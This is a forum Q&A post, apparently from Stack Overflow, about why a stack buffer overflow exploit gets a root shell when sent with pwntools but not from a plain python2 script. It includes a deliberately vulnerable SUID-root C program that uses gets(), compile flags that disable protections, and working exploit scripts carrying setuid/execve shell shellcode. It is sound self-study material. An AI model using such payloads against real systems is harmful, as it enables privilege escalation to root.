# Buffer overflow exploit only working using pwntools

Tags: python, vmware, cat, buffer-overflow, kali-linux

I am attempting to create a buffer-overflow on a simple x64 C binary without any protections (i.e. ASLR, canary, PIE, NX, Parial RelRO, Fortify). I am using an (updated) x64 Kali Linux 2020.4 distro (in vmware using the vmware image from the official offensive security website). I am compiling the program as root and I am enabling the SUID bit to access the program with root privilidges from an unpriviledged account. The code of the vulnerable program (`example.c`) is the following:

```
#include<stdio.h>
#include<string.h>

void vuln_func();

int main(int argc, char *argv[])
{
    printf("Hi there!\n");
    vuln_func();
}

void vuln_func()
{
    char buffer[256];
    gets(buffer);
}
```

and to compile the program I am using the following `Makefile`:

```
all: 
     gcc -no-pie -fno-stack-protector example.c -o example -D_FORTIFY_SOURCE=0
clean:
    rm example
```

Using python3's pwntools to create an exploit works just fine and I get a root shell.

```
from pwn import *

nopsled = b"\x90"*100
shellcode = b"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"

padding = b"A"*(256-len(shellcode)-len(nopsled))
padding += b"B"*8
padding += p64(0x7fffffffdec4)

payload = nopsled + shellcode + padding

p = process("./example")
p.recv()
p.sendline(payload)
p.interactive()
```

but when I am using the exact same payload on python2 without using pwntools it doesn't.

```
import struct

nopsled = "\x90"*100
shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"

padding = "A"*(256-len(shellcode)-len(nopsled))
padding += "B"*8
padding += struct.pack("Q", 0x7fffffffdec4)

payload = nopsled + shellcode + padding

print payload
```

and then running it using:

```
$(python exploit.py; cat) | ./example
```

The `cat` command "catches" the stdin but when I provide commands nothing happens.

```
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ $(python exploit.py ; cat) | ./example
Hi there!

whoami
id

^C
                                                                                                             
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$
```

What is really weird is that when adding an "\xCC" byte before the shellcode,

```
shellcode = "\xcc\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
```

I get a sigtrap message like that:

```
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ python exploit.py | ./example  
Hi there!
zsh: done        python exploit.py | 
zsh: trace trap  ./example
```

Any ideas why that happens?

Comment: Python 2 supports `b'blah blah'` byte literals as well.

Answer (score 0):

In my case, I faced this exact problem while using Python3. I used `sys.stdout.buffer.write()` instead of the `print` function to overcome this problem.

The PoC is available on my blog on [Buffer Overflows](https://sidthoviti.com/buffer-overflows-the-art-of-stack-smashing/).